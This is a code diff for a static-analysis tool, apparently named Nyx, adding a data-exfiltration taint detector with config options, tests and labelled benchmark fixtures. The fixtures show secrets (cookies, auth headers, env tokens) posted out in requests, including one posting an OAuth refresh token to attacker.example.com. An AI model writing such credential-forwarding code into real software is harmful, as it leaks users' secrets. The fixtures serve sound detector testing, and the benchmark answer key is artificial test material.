if acc.return_type != r.return_type { acc.return_type = None; diff --git a/src/taint/ssa_transfer/state.rs b/src/taint/ssa_transfer/state.rs index a9fdd8c8..1d0f5350 100644 --- a/src/taint/ssa_transfer/state.rs +++ b/src/taint/ssa_transfer/state.rs @@ -753,6 +753,8 @@ fn origin_sort_key(o: &TaintOrigin) -> (usize, usize, u8, usize) { crate::labels::SourceKind::Database => 3, crate::labels::SourceKind::CaughtException => 4, crate::labels::SourceKind::Unknown => 5, + crate::labels::SourceKind::Cookie => 6, + crate::labels::SourceKind::Header => 7, }; (span_start, span_end, kind_tag, o.node.index()) } diff --git a/src/taint/ssa_transfer/summary_extract.rs b/src/taint/ssa_transfer/summary_extract.rs index 17e92c3b..724bbea2 100644 --- a/src/taint/ssa_transfer/summary_extract.rs +++ b/src/taint/ssa_transfer/summary_extract.rs @@ -387,6 +387,15 @@ pub fn extract_ssa_func_summary_full( let mut param_to_return = Vec::new(); let mut param_to_sink: Vec<(usize, SmallVec<[SinkSite; 1]>)> = Vec::new(); let mut param_to_sink_param = Vec::new(); + // Per-param gate-filter cap masks lifted from inner multi-gate sink calls. + // Populated when the per-param probe reaches a sink whose CFG node carries + // [`crate::cfg::CallMeta::gate_filters`] with more than one entry, the + // multi-gate dispatch in `collect_block_events` has already cap-narrowed + // `event.sink_caps` to the matching gate's `label_caps`, so we record the + // pair as-is. Cross-file callers consume this list to preserve per-position + // cap attribution through wrapper functions like + // `fn forward(url, body) { fetch(url, {body}) }`. + let mut param_to_gate_filters: Vec<(usize, Cap)> = Vec::new(); // Per-param return-path decomposition. Populated only when the param // has ≥2 distinct return-block predicate hashes, a single-return-path // callee is already precise via `param_to_return`. 
@@ -541,6 +550,28 @@ pub fn extract_ssa_func_summary_full( for pos in extract_sink_arg_positions(event, ssa) { param_to_sink_param.push((idx, pos, event.sink_caps)); } + // Per-position gate-filter cap lifting. + // + // When the sink callee carries multiple gate filters (e.g. `fetch` + // is both an SSRF gate on the URL arg and a `DATA_EXFIL` gate on + // the body arg), the multi-gate dispatch has already filtered + // `event.sink_caps` down to the specific gate's `label_caps` for + // this probe. Recording `(idx, event.sink_caps)` preserves that + // narrowing across the function-summary boundary so a caller of + // the wrapper splits SSRF from DATA_EXFIL findings instead of + // joining them under a single union. + // + // Single-gate / no-gate sinks are skipped, the existing + // `param_to_sink` machinery already records those without + // per-position cap conflict. + if !event.sink_caps.is_empty() + && cfg[event.sink_node].call.gate_filters.len() > 1 + && !param_to_gate_filters + .iter() + .any(|&(i, c)| i == idx && c == event.sink_caps) + { + param_to_gate_filters.push((idx, event.sink_caps)); + } if event.sink_caps.is_empty() { continue; } @@ -641,6 +672,7 @@ pub fn extract_ssa_func_summary_full( param_to_sink, source_caps, param_to_sink_param, + param_to_gate_filters, param_container_to_return, param_to_container_store, return_type, diff --git a/src/taint/ssa_transfer/tests.rs b/src/taint/ssa_transfer/tests.rs index cd32ace2..930fc1ae 100644 --- a/src/taint/ssa_transfer/tests.rs +++ b/src/taint/ssa_transfer/tests.rs @@ -85,6 +85,8 @@ mod cross_file_tests { exception_edges: vec![], field_interner: crate::ssa::ir::FieldInterner::default(), field_writes: std::collections::HashMap::new(), + + synthetic_externals: std::collections::HashSet::new(), }, opt: crate::ssa::OptimizeResult { const_values: std::collections::HashMap::new(), @@ -832,6 +834,8 @@ mod primary_sink_location_tests { exception_edges: vec![], field_interner: 
crate::ssa::ir::FieldInterner::default(), field_writes: std::collections::HashMap::new(), + + synthetic_externals: std::collections::HashSet::new(), } } @@ -963,6 +967,8 @@ mod goto_succ_propagation_tests { exception_edges: vec![], field_interner: crate::ssa::ir::FieldInterner::default(), field_writes: std::collections::HashMap::new(), + + synthetic_externals: std::collections::HashSet::new(), }; let cfg: Cfg = Graph::new(); @@ -1053,6 +1059,8 @@ mod goto_succ_propagation_tests { exception_edges: vec![], field_interner: crate::ssa::ir::FieldInterner::default(), field_writes: std::collections::HashMap::new(), + + synthetic_externals: std::collections::HashSet::new(), }; let cfg: Cfg = Graph::new(); let interner = SymbolInterner::new(); @@ -1112,6 +1120,8 @@ mod goto_succ_propagation_tests { exception_edges: vec![], field_interner: crate::ssa::ir::FieldInterner::default(), field_writes: std::collections::HashMap::new(), + + synthetic_externals: std::collections::HashSet::new(), } } @@ -1298,6 +1308,8 @@ mod goto_succ_propagation_tests { exception_edges: vec![], field_interner: crate::ssa::ir::FieldInterner::default(), field_writes: std::collections::HashMap::new(), + + synthetic_externals: std::collections::HashSet::new(), } } @@ -1423,6 +1435,8 @@ mod receiver_candidates_field_proj_tests { exception_edges: vec![], field_interner: interner, field_writes: std::collections::HashMap::new(), + + synthetic_externals: std::collections::HashSet::new(), } } @@ -1508,6 +1522,8 @@ mod receiver_candidates_field_proj_tests { exception_edges: vec![], field_interner: interner, field_writes: std::collections::HashMap::new(), + + synthetic_externals: std::collections::HashSet::new(), }; let cands = super::super::receiver_candidates_for_type_lookup(SsaValue(0), Some(&body), Lang::Go); @@ -1550,6 +1566,7 @@ mod fanout_merge_tests { param_return_paths: vec![], points_to: Default::default(), field_points_to: Default::default(), + param_to_gate_filters: vec![], } } @@ -1909,6 +1926,7 @@ 
mod field_write_tests { exception_edges: vec![], field_interner, field_writes, + synthetic_externals: HashSet::new(), }; (body, cache_id) } @@ -2206,6 +2224,7 @@ mod field_write_tests { m.insert(SsaValue(2), (SsaValue(0), cache_id)); m }, + synthetic_externals: HashSet::new(), }; let pf = crate::pointer::analyse_body(&body, crate::cfg::BodyId(0)); // v0 is Const → empty pt, the hook should not insert anything. @@ -2437,6 +2456,8 @@ mod container_elem_tests { exception_edges: vec![], field_interner: crate::ssa::ir::FieldInterner::default(), field_writes: HashMap::new(), + + synthetic_externals: HashSet::new(), }; // Run pointer analysis first to confirm the result of `shift()` @@ -2575,6 +2596,8 @@ mod container_elem_tests { exception_edges: vec![], field_interner: crate::ssa::ir::FieldInterner::default(), field_writes: HashMap::new(), + + synthetic_externals: HashSet::new(), }; let pf = crate::pointer::analyse_body(&body, crate::cfg::BodyId(7)); @@ -2715,6 +2738,8 @@ mod container_elem_tests { exception_edges: vec![], field_interner: crate::ssa::ir::FieldInterner::default(), field_writes: HashMap::new(), + + synthetic_externals: HashSet::new(), }; let interner = SymbolInterner::new(); @@ -2838,6 +2863,8 @@ mod cross_call_field_tests { exception_edges: vec![], field_interner, field_writes: HashMap::new(), + + synthetic_externals: HashSet::new(), }; let pf = crate::pointer::analyse_body(&body, crate::cfg::BodyId(7)); (body, cache_id, pf) @@ -3210,6 +3237,8 @@ mod field_taint_origin_cap_tests { exception_edges: vec![], field_interner, field_writes: HashMap::new(), + + synthetic_externals: HashSet::new(), }; (body, cache_id, cfg, n_proj) } @@ -3533,6 +3562,7 @@ mod pointer_lattice_worklist_tests { exception_edges: vec![], field_interner, field_writes, + synthetic_externals: HashSet::new(), }; let mut interner = SymbolInterner::new(); diff --git a/src/utils/config.rs b/src/utils/config.rs index 47876fc3..4c5dacd2 100644 --- a/src/utils/config.rs +++ 
b/src/utils/config.rs @@ -712,6 +712,10 @@ pub struct Config { pub output: OutputConfig, pub performance: PerformanceConfig, pub analysis: AnalysisRulesConfig, + /// Per-detector knobs ([detectors.*] in nyx.conf). Currently exposes + /// `[detectors.data_exfil]` for cross-boundary leak suppression. + #[serde(default)] + pub detectors: crate::utils::detector_options::DetectorOptions, pub server: ServerConfig, pub runs: RunsConfig, pub profiles: HashMap, @@ -1018,6 +1022,17 @@ pub(crate) fn merge_configs(mut default: Config, user: Config) -> Config { default.profiles.insert(name, profile); } + // --- DetectorOptions --- + // Wholesale replace: each `[detectors.*]` field uses #[serde(default)], + // so any omitted field already inherits the documented defaults during + // user-config deserialization. trusted_destinations is union-merged so + // the user adds to (rather than replaces) any future built-in defaults. + default.detectors.data_exfil.enabled = user.detectors.data_exfil.enabled; + extend_dedup( + &mut default.detectors.data_exfil.trusted_destinations, + user.detectors.data_exfil.trusted_destinations, + ); + // --- AnalysisRulesConfig --- // Engine options: wholesale replace. User's engine block is already // serde-merged with defaults (via #[serde(default)] per field), so any diff --git a/src/utils/detector_options.rs b/src/utils/detector_options.rs new file mode 100644 index 00000000..adb4d061 --- /dev/null +++ b/src/utils/detector_options.rs @@ -0,0 +1,129 @@ +//! Per-detector runtime options. +//! +//! Mirrors the install/current pattern in [`crate::utils::analysis_options`] +//! but for detector-class knobs that live under `[detectors.*]` in +//! `nyx.conf`. Engine code that wants to consult a detector option calls +//! [`current`]; the CLI installs a resolved value before the scan starts. +//! +//! The first knobs covered here are the [`Cap::DATA_EXFIL`][crate::labels::Cap::DATA_EXFIL] +//! suppression layers: +//! +//! 
* `enabled` — turn the cap off entirely per-project so legitimate +//! forwarding pipelines don't surface findings. +//! * `trusted_destinations` — destination URL prefixes that suppress the +//! cap when a sink's URL argument has a static prefix matching one of +//! them. Uses the same prefix-lock plumbing the SSRF suppression has. +//! +//! Defaults are conservative: detector enabled, no trusted destinations. + +use serde::{Deserialize, Serialize}; +use std::sync::RwLock; + +/// Options for the `Cap::DATA_EXFIL` suppression layers. +#[derive(Debug, Clone, PartialEq, Eq, Serialize, Deserialize)] +#[serde(default)] +pub struct DataExfilDetectorOptions { + /// When `false`, the entire data-exfiltration detector class is + /// suppressed for the project. Sink-time filters drop + /// [`crate::labels::Cap::DATA_EXFIL`] from sink caps before event + /// emission, so no `taint-data-exfiltration` findings reach output. + pub enabled: bool, + /// URL prefixes treated as trusted destinations for outbound + /// requests. When a sink's destination argument has a proven static + /// prefix (from the abstract string domain or an inline literal) + /// that begins with one of these entries, the + /// [`crate::labels::Cap::DATA_EXFIL`] bit is dropped before event + /// emission. Mirrors the SSRF prefix-lock semantics. + pub trusted_destinations: Vec<String>, +} + +impl Default for DataExfilDetectorOptions { + fn default() -> Self { + Self { + enabled: true, + trusted_destinations: Vec::new(), + } + } +} + +/// Top-level `[detectors]` block. +#[derive(Debug, Clone, Default, PartialEq, Eq, Serialize, Deserialize)] +#[serde(default)] +pub struct DetectorOptions { + pub data_exfil: DataExfilDetectorOptions, +} + +static RUNTIME: RwLock<Option<DetectorOptions>> = RwLock::new(None); + +/// Install the process-wide detector options. First-wins: subsequent calls +/// are a no-op and return `false`.
The CLI calls this once per process at
+/// scan start; library consumers that never install pick up
+/// [`DetectorOptions::default`] via [`current`].
+pub fn install(opts: DetectorOptions) -> bool {
+    let mut slot = RUNTIME.write().expect("detector options RwLock poisoned");
+    let vacant = slot.is_none();
+    if vacant {
+        *slot = Some(opts);
+    }
+    vacant
+}
+
+/// Overwrite the installed options unconditionally, mirroring
+/// [`crate::utils::analysis_options::reinstall`] for the server's
+/// per-request resolution path.
+pub fn reinstall(opts: DetectorOptions) {
+    *RUNTIME.write().expect("detector options RwLock poisoned") = Some(opts);
+}
+
+/// Snapshot the active options: a clone of the installed value, or
+/// [`DetectorOptions::default`] when nothing has been installed.
+pub fn current() -> DetectorOptions {
+    let slot = RUNTIME.read().expect("detector options RwLock poisoned");
+    match slot.as_ref() {
+        Some(installed) => installed.clone(),
+        None => DetectorOptions::default(),
+    }
+}
+
+/// Test helper: clear the installed runtime so a subsequent [`install`]
+/// takes effect. Used only in tests that exercise different detector
+/// configurations within the same process.
+#[doc(hidden)] +pub fn _reset_for_tests() { + *RUNTIME.write().expect("detector options RwLock poisoned") = None; +} + +#[cfg(test)] +mod tests { + use super::*; + + #[test] + fn defaults_match_documented() { + let o = DetectorOptions::default(); + assert!(o.data_exfil.enabled); + assert!(o.data_exfil.trusted_destinations.is_empty()); + } + + #[test] + fn toml_roundtrip() { + let opts = DetectorOptions { + data_exfil: DataExfilDetectorOptions { + enabled: false, + trusted_destinations: vec![ + "https://api.internal/".into(), + "https://telemetry.".into(), + ], + }, + }; + let s = toml::to_string(&opts).unwrap(); + let back: DetectorOptions = toml::from_str(&s).unwrap(); + assert_eq!(opts, back); + } + + #[test] + fn missing_section_uses_defaults() { + let toml_str = r#"# empty"#; + let cfg: DetectorOptions = toml::from_str(toml_str).unwrap(); + assert!(cfg.data_exfil.enabled); + } +} diff --git a/src/utils/mod.rs b/src/utils/mod.rs index efc2d147..d1c7396a 100644 --- a/src/utils/mod.rs +++ b/src/utils/mod.rs @@ -1,5 +1,6 @@ pub mod analysis_options; pub mod config; +pub mod detector_options; pub(crate) mod ext; pub mod path; pub mod project; @@ -8,4 +9,5 @@ pub(crate) mod snippet; pub use analysis_options::{AnalysisOptions, SymexOptions}; pub use config::Config; +pub use detector_options::{DataExfilDetectorOptions, DetectorOptions}; pub use project::{detect_frameworks, get_project_info}; diff --git a/tests/backwards_analysis_tests.rs b/tests/backwards_analysis_tests.rs index 90b805eb..04e5e04d 100644 --- a/tests/backwards_analysis_tests.rs +++ b/tests/backwards_analysis_tests.rs @@ -104,7 +104,33 @@ fn demand_driven_suite() { "no_source: no backwards-confirmed notes on a source-free fixture" ); - // ── 5. backwards OFF is a strict no-op: no confirmed notes. + // ── 5. data_exfil cap parity: the backwards engine must + // round-trip `Cap::DATA_EXFIL` exactly like SQL/CMD/SSRF. 
+ // The forward engine fires `taint-data-exfiltration` + // on a cookie → fetch-body flow; backwards must reach + // the request.cookies source and confirm. + set_backwards(true); + let dir = fixture_path("demand_driven_data_exfil"); + let diags = scan_fixture_dir(&dir, AnalysisMode::Full); + validate_expectations(&diags, &dir); + let exfil_confirmed = diags + .iter() + .filter(|d| { + d.id.starts_with("taint-data-exfiltration") + && has_backwards_note(d, "backwards-confirmed") + }) + .count(); + assert!( + exfil_confirmed >= 1, + "data_exfil: expected ≥1 backwards-confirmed taint-data-exfiltration finding; got diags: {}", + diags + .iter() + .map(|d| format!("{}:{}", d.id, d.line)) + .collect::<Vec<_>>() + .join(", ") + ); + + // ── 6. backwards OFF is a strict no-op: no confirmed notes. set_backwards(false); let dir = fixture_path("demand_driven_reach_source"); let diags = scan_fixture_dir(&dir, AnalysisMode::Full); diff --git a/tests/benchmark/corpus/c/data_exfil/exfil_curl_postfields_env.c b/tests/benchmark/corpus/c/data_exfil/exfil_curl_postfields_env.c new file mode 100644 index 00000000..95d6f6eb --- /dev/null +++ b/tests/benchmark/corpus/c/data_exfil/exfil_curl_postfields_env.c @@ -0,0 +1,17 @@ +// DATA_EXFIL: env-config (Sensitive source) flows into the gated +// curl_easy_setopt sink at the CURLOPT_POSTFIELDS activation. The +// destination URL is set by a separate CURLOPT_URL setopt above; only +// the body-binding setopt fires DATA_EXFIL.
+#include <stdlib.h>
+#include <curl/curl.h>
+
+void leak_env(void) {
+    char *token = getenv("AUTH_TOKEN");
+    if (!token) return;
+
+    CURL *curl = curl_easy_init();
+    curl_easy_setopt(curl, CURLOPT_URL, "https://analytics.internal/track");
+    curl_easy_setopt(curl, CURLOPT_POSTFIELDS, token);
+    curl_easy_perform(curl);
+    curl_easy_cleanup(curl);
+}
diff --git a/tests/benchmark/corpus/c/safe/safe_data_exfil_user_input_echo.c b/tests/benchmark/corpus/c/safe/safe_data_exfil_user_input_echo.c
new file mode 100644
index 00000000..e4e35dde
--- /dev/null
+++ b/tests/benchmark/corpus/c/safe/safe_data_exfil_user_input_echo.c
@@ -0,0 +1,16 @@
+// DATA_EXFIL safe: plain user input via fgets/stdin forwarded into the
+// CURLOPT_POSTFIELDS body of a fixed-URL curl request must not fire.
+// Sensitivity-gate strips the cap for Plain-tier sources.
+#include <stdio.h>
+#include <curl/curl.h>
+
+void forward_stdin(void) {
+    char input[256];
+    if (!fgets(input, sizeof(input), stdin)) return;
+
+    CURL *curl = curl_easy_init();
+    curl_easy_setopt(curl, CURLOPT_URL, "https://telemetry.internal/forward");
+    curl_easy_setopt(curl, CURLOPT_POSTFIELDS, input);
+    curl_easy_perform(curl);
+    curl_easy_cleanup(curl);
+}
diff --git a/tests/benchmark/corpus/go/data_exfil/exfil_http_post_cookie_body.go b/tests/benchmark/corpus/go/data_exfil/exfil_http_post_cookie_body.go
new file mode 100644
index 00000000..ed5c1215
--- /dev/null
+++ b/tests/benchmark/corpus/go/data_exfil/exfil_http_post_cookie_body.go
@@ -0,0 +1,14 @@
+// DATA_EXFIL: a session cookie (Sensitive source) flows into the body
+// of http.Post() at a hardcoded destination URL.
+package fixture + +import ( + "net/http" + "strings" +) + +func leakCookie(r *http.Request) { + c, _ := r.Cookie("session") + body := strings.NewReader(c.Value) + http.Post("https://analytics.internal/track", "text/plain", body) +} diff --git a/tests/benchmark/corpus/go/safe/safe_data_exfil_user_input_echo.go b/tests/benchmark/corpus/go/safe/safe_data_exfil_user_input_echo.go new file mode 100644 index 00000000..5ea2621b --- /dev/null +++ b/tests/benchmark/corpus/go/safe/safe_data_exfil_user_input_echo.go @@ -0,0 +1,15 @@ +// DATA_EXFIL safe: plain attacker-controlled user input forwarded to a +// fixed-destination http.Post body must not fire. Sensitivity-gate +// strips the cap because the source is Plain-tier user input. +package fixture + +import ( + "net/http" + "strings" +) + +func forwardUserInput(r *http.Request) { + msg := r.FormValue("msg") + body := strings.NewReader(msg) + http.Post("https://analytics.internal/track", "text/plain", body) +} diff --git a/tests/benchmark/corpus/java/data_exfil/DataExfilJdkHttpClient.java b/tests/benchmark/corpus/java/data_exfil/DataExfilJdkHttpClient.java new file mode 100644 index 00000000..ac695255 --- /dev/null +++ b/tests/benchmark/corpus/java/data_exfil/DataExfilJdkHttpClient.java @@ -0,0 +1,23 @@ +// DATA_EXFIL: a Sensitive cookie source flows through +// BodyPublishers.ofString() into the request builder chain and finally +// into client.send() at a hardcoded destination URL. 
+import java.net.URI; +import java.net.http.HttpClient; +import java.net.http.HttpRequest; +import java.net.http.HttpRequest.BodyPublishers; +import java.net.http.HttpResponse.BodyHandlers; +import javax.servlet.http.Cookie; +import javax.servlet.http.HttpServletRequest; + +public class DataExfilJdkHttpClient { + public void leak(HttpServletRequest request) throws Exception { + Cookie[] cookies = request.getCookies(); + String session = cookies[0].getValue(); + HttpClient client = HttpClient.newHttpClient(); + HttpRequest req = HttpRequest.newBuilder() + .uri(URI.create("https://analytics.internal/track")) + .POST(BodyPublishers.ofString(session)) + .build(); + client.send(req, BodyHandlers.ofString()); + } +} diff --git a/tests/benchmark/corpus/java/data_exfil/DataExfilOkHttp.java b/tests/benchmark/corpus/java/data_exfil/DataExfilOkHttp.java new file mode 100644 index 00000000..b6f4d82b --- /dev/null +++ b/tests/benchmark/corpus/java/data_exfil/DataExfilOkHttp.java @@ -0,0 +1,24 @@ +// DATA_EXFIL: an OkHttp two-step where a session attribute (Sensitive +// source) is wrapped via RequestBody.create and bound to a request +// targeting a hardcoded URL. The chain-normalized newCall.execute +// matcher fires DATA_EXFIL on the body bind. 
+import javax.servlet.http.HttpSession; +import okhttp3.MediaType; +import okhttp3.OkHttpClient; +import okhttp3.Request; +import okhttp3.RequestBody; +import okhttp3.Response; + +public class DataExfilOkHttp { + public void leak(HttpSession session) throws Exception { + String token = (String) session.getAttribute("csrfToken"); + OkHttpClient client = new OkHttpClient(); + RequestBody body = RequestBody.create( + token, MediaType.parse("text/plain")); + Request req = new Request.Builder() + .url("https://analytics.internal/track") + .post(body) + .build(); + Response resp = client.newCall(req).execute(); + } +} diff --git a/tests/benchmark/corpus/javascript/data_exfil/exfil_fetch_cookie_body.js b/tests/benchmark/corpus/javascript/data_exfil/exfil_fetch_cookie_body.js new file mode 100644 index 00000000..74341596 --- /dev/null +++ b/tests/benchmark/corpus/javascript/data_exfil/exfil_fetch_cookie_body.js @@ -0,0 +1,10 @@ +// DATA_EXFIL: a session cookie (Sensitive-tier source) flows into the +// outbound body of fetch() at a fixed destination. SSRF must NOT fire +// because the URL is a hardcoded literal. +function leakBody(req) { + var payload = req.cookies.session; + fetch('/endpoint', { + method: 'POST', + body: payload, + }); +} diff --git a/tests/benchmark/corpus/javascript/data_exfil/exfil_fetch_external_destination.js b/tests/benchmark/corpus/javascript/data_exfil/exfil_fetch_external_destination.js new file mode 100644 index 00000000..1a2e8058 --- /dev/null +++ b/tests/benchmark/corpus/javascript/data_exfil/exfil_fetch_external_destination.js @@ -0,0 +1,10 @@ +// DATA_EXFIL: a session cookie (Sensitive-tier source) flows into the +// outbound body of fetch() at an attacker-controlled host. SSRF stays +// silent (URL is a static literal); DATA_EXFIL fires. 
+function leakBodyExternal(req) { + var payload = req.cookies.session; + fetch('https://untrusted.example.com/intake', { + method: 'POST', + body: payload, + }); +} diff --git a/tests/benchmark/corpus/javascript/data_exfil/exfil_xhr_send_header.js b/tests/benchmark/corpus/javascript/data_exfil/exfil_xhr_send_header.js new file mode 100644 index 00000000..cc23e8b3 --- /dev/null +++ b/tests/benchmark/corpus/javascript/data_exfil/exfil_xhr_send_header.js @@ -0,0 +1,9 @@ +// DATA_EXFIL: a request header (Sensitive-tier source) flows into the +// body of XMLHttpRequest.send(). The destination is a static literal, so +// SSRF must not fire. +function leakHeader(req) { + var auth = req.headers.authorization; + var xhr = new XMLHttpRequest(); + xhr.open('POST', '/upstream'); + xhr.send(auth); +} diff --git a/tests/benchmark/corpus/javascript/safe/safe_data_exfil_sanitizer_wrap.js b/tests/benchmark/corpus/javascript/safe/safe_data_exfil_sanitizer_wrap.js new file mode 100644 index 00000000..4efb6bfb --- /dev/null +++ b/tests/benchmark/corpus/javascript/safe/safe_data_exfil_sanitizer_wrap.js @@ -0,0 +1,8 @@ +// DATA_EXFIL safe: routing a Sensitive cookie source through the named +// telemetry boundary `logEvent` is the developer's explicit decision to +// forward; the default Sanitizer(data_exfil) convention strips the cap. +function track(req) { + logEvent({ + user: req.cookies.session, + }); +} diff --git a/tests/benchmark/corpus/javascript/safe/safe_data_exfil_user_input_echo.js b/tests/benchmark/corpus/javascript/safe/safe_data_exfil_user_input_echo.js new file mode 100644 index 00000000..63e975cd --- /dev/null +++ b/tests/benchmark/corpus/javascript/safe/safe_data_exfil_user_input_echo.js @@ -0,0 +1,10 @@ +// DATA_EXFIL safe: plain user input echoed into a fetch() body must not +// fire. The user already controls req.body.message; surfacing it back +// into the outbound payload is not a cross-boundary disclosure. 
+function forwardUserMessage(req) { + var message = req.body.message; + fetch('/forward', { + method: 'POST', + body: message, + }); +} diff --git a/tests/benchmark/corpus/python/data_exfil/exfil_httpx_async_post_env.py b/tests/benchmark/corpus/python/data_exfil/exfil_httpx_async_post_env.py new file mode 100644 index 00000000..2abb33a6 --- /dev/null +++ b/tests/benchmark/corpus/python/data_exfil/exfil_httpx_async_post_env.py @@ -0,0 +1,17 @@ +import os +from fastapi import FastAPI, Request +import httpx + +app = FastAPI() + + +# DATA_EXFIL: env-config secret flows into the json kwarg of an async +# httpx.AsyncClient().post() at a fixed destination URL. +@app.post('/sync-async') +async def sync_async(req: Request): + api_key = os.environ.get('UPSTREAM_API_KEY') + await httpx.AsyncClient().post( + 'https://upstream.internal/ingest', + json={'api_key': api_key}, + ) + return {'ok': True} diff --git a/tests/benchmark/corpus/python/data_exfil/exfil_requests_post_env_dict.py b/tests/benchmark/corpus/python/data_exfil/exfil_requests_post_env_dict.py new file mode 100644 index 00000000..214950ad --- /dev/null +++ b/tests/benchmark/corpus/python/data_exfil/exfil_requests_post_env_dict.py @@ -0,0 +1,16 @@ +import os +import requests +from flask import Flask + +app = Flask(__name__) + + +# DATA_EXFIL: env-config secrets accumulate into a dict, then flow as the +# json kwarg of requests.post() at a fixed destination URL. 
+@app.route('/upload-config', methods=['POST']) +def upload_config(): + payload = {} + payload['api_key'] = os.environ.get('UPSTREAM_API_KEY') + payload['region'] = os.environ.get('UPSTREAM_REGION') + requests.post('https://api.internal/ingest', json=payload) + return 'ok' diff --git a/tests/benchmark/corpus/python/safe/safe_data_exfil_user_input_echo.py b/tests/benchmark/corpus/python/safe/safe_data_exfil_user_input_echo.py new file mode 100644 index 00000000..4052940d --- /dev/null +++ b/tests/benchmark/corpus/python/safe/safe_data_exfil_user_input_echo.py @@ -0,0 +1,14 @@ +import requests +from flask import Flask, request + +app = Flask(__name__) + + +# DATA_EXFIL safe: plain user input echoed into a fixed-destination +# requests.post body must not fire. Sensitivity-gate strips the cap +# because the source is Plain-tier (raw user input). +@app.route('/forward', methods=['POST']) +def forward(): + message = request.form.get('message') + requests.post('https://telemetry.internal/forward', json={'message': message}) + return 'ok' diff --git a/tests/benchmark/corpus/ruby/data_exfil/exfil_net_http_post_cookie.rb b/tests/benchmark/corpus/ruby/data_exfil/exfil_net_http_post_cookie.rb new file mode 100644 index 00000000..9692c121 --- /dev/null +++ b/tests/benchmark/corpus/ruby/data_exfil/exfil_net_http_post_cookie.rb @@ -0,0 +1,10 @@ +require 'net/http' +require 'uri' + +# DATA_EXFIL: a session cookie (Sensitive source) flows into the body +# of Net::HTTP.post at a fixed destination URL. 
+def forward_session(request) + sid = request.cookies[:auth_token] + uri = URI('https://analytics.internal/track') + Net::HTTP.post(uri, "session=#{sid}") +end diff --git a/tests/benchmark/corpus/ruby/safe/safe_data_exfil_user_input_echo.rb b/tests/benchmark/corpus/ruby/safe/safe_data_exfil_user_input_echo.rb new file mode 100644 index 00000000..f8c0fb33 --- /dev/null +++ b/tests/benchmark/corpus/ruby/safe/safe_data_exfil_user_input_echo.rb @@ -0,0 +1,12 @@ +require 'rest-client' + +# DATA_EXFIL safe: plain user input echoed into a RestClient.post body +# at a fixed destination URL must not fire. Sensitivity-gate strips the +# cap for Plain-tier sources. +def forward_message(params) + message = params[:message] + RestClient.post( + 'https://telemetry.internal/forward', + { message: message }.to_json + ) +end diff --git a/tests/benchmark/corpus/rust/data_exfil/exfil_reqwest_form_env.rs b/tests/benchmark/corpus/rust/data_exfil/exfil_reqwest_form_env.rs new file mode 100644 index 00000000..c49e6634 --- /dev/null +++ b/tests/benchmark/corpus/rust/data_exfil/exfil_reqwest_form_env.rs @@ -0,0 +1,10 @@ +// DATA_EXFIL: env-config (Sensitive source) flows into reqwest's .form() +// chain at a fixed destination URL. The form-encoded payload leaks the +// operator-bound secret across the outbound boundary. +fn exfil_form() { + let secret = std::env::var("OAUTH_REFRESH_TOKEN").unwrap(); + let _ = reqwest::Client::new() + .post("https://attacker.example.com/collect") + .form(&secret) + .send(); +} diff --git a/tests/benchmark/corpus/typescript/data_exfil/exfil_fetch_cookie_body.ts b/tests/benchmark/corpus/typescript/data_exfil/exfil_fetch_cookie_body.ts new file mode 100644 index 00000000..e568eaca --- /dev/null +++ b/tests/benchmark/corpus/typescript/data_exfil/exfil_fetch_cookie_body.ts @@ -0,0 +1,10 @@ +// DATA_EXFIL: a session cookie (Sensitive-tier source) flows into the +// outbound body of fetch() at a fixed destination. 
SSRF must NOT fire +// because the URL is a hardcoded literal. +function leakBody(req: { cookies: { session: string } }): void { + const payload = req.cookies.session; + fetch('/endpoint', { + method: 'POST', + body: payload, + }); +} diff --git a/tests/benchmark/corpus/typescript/data_exfil/exfil_fetch_header_body.ts b/tests/benchmark/corpus/typescript/data_exfil/exfil_fetch_header_body.ts new file mode 100644 index 00000000..03fa6ff8 --- /dev/null +++ b/tests/benchmark/corpus/typescript/data_exfil/exfil_fetch_header_body.ts @@ -0,0 +1,10 @@ +// DATA_EXFIL: a request header (Sensitive-tier source) flows into the +// body of fetch() via the body field of the init object. Destination is +// a static literal so SSRF must not fire. +function leakHeader(req: { headers: { authorization: string } }): void { + const auth = req.headers.authorization; + fetch('https://analytics.internal/track', { + method: 'POST', + body: auth, + }); +} diff --git a/tests/benchmark/ground_truth.json b/tests/benchmark/ground_truth.json index a6483664..5f0cbc6f 100644 --- a/tests/benchmark/ground_truth.json +++ b/tests/benchmark/ground_truth.json @@ -3,7 +3,7 @@ "metadata": { "description": "Nyx benchmark ground truth", "created": "2026-03-20", - "corpus_size": 458 + "corpus_size": 477 }, "cases": [ { @@ -14474,6 +14474,576 @@ ], "disabled": false, "notes": "Vulnerable counterpart to py-auth-realrepo-005: same FastAPI route shape but no `dependencies=[Depends(...)]` keyword arg. Regression guard: the dependency-injection recogniser must not blanket-suppress every FastAPI route." 
+ }, + { + "case_id": "js-data_exfil-001", + "file": "javascript/data_exfil/exfil_fetch_cookie_body.js", + "language": "javascript", + "is_vulnerable": true, + "vuln_class": "data_exfil", + "cwe": "CWE-201", + "provenance": "synthetic", + "equivalence_tier": "exact", + "match_mode": "rule_match", + "expected_rule_ids": [ + "taint-data-exfiltration" + ], + "allowed_alternative_rule_ids": [], + "forbidden_rule_ids": [], + "expected_severity": "HIGH", + "expected_category": "Security", + "expected_sink_lines": [ + [6, 9] + ], + "expected_source_lines": [ + [5, 5] + ], + "tags": [ + "data_exfil", + "fetch", + "cookie" + ], + "disabled": false, + "notes": "Cookie source flows into fetch body at hardcoded URL; DATA_EXFIL must fire and SSRF must not." + }, + { + "case_id": "js-data_exfil-002", + "file": "javascript/data_exfil/exfil_fetch_external_destination.js", + "language": "javascript", + "is_vulnerable": true, + "vuln_class": "data_exfil", + "cwe": "CWE-201", + "provenance": "synthetic", + "equivalence_tier": "exact", + "match_mode": "rule_match", + "expected_rule_ids": [ + "taint-data-exfiltration" + ], + "allowed_alternative_rule_ids": [], + "forbidden_rule_ids": [], + "expected_severity": "HIGH", + "expected_category": "Security", + "expected_sink_lines": [ + [6, 9] + ], + "expected_source_lines": [ + [5, 5] + ], + "tags": [ + "data_exfil", + "fetch", + "cookie", + "external-destination" + ], + "disabled": false, + "notes": "Cookie source flows into fetch body at attacker-controlled host; DATA_EXFIL fires, SSRF does not." 
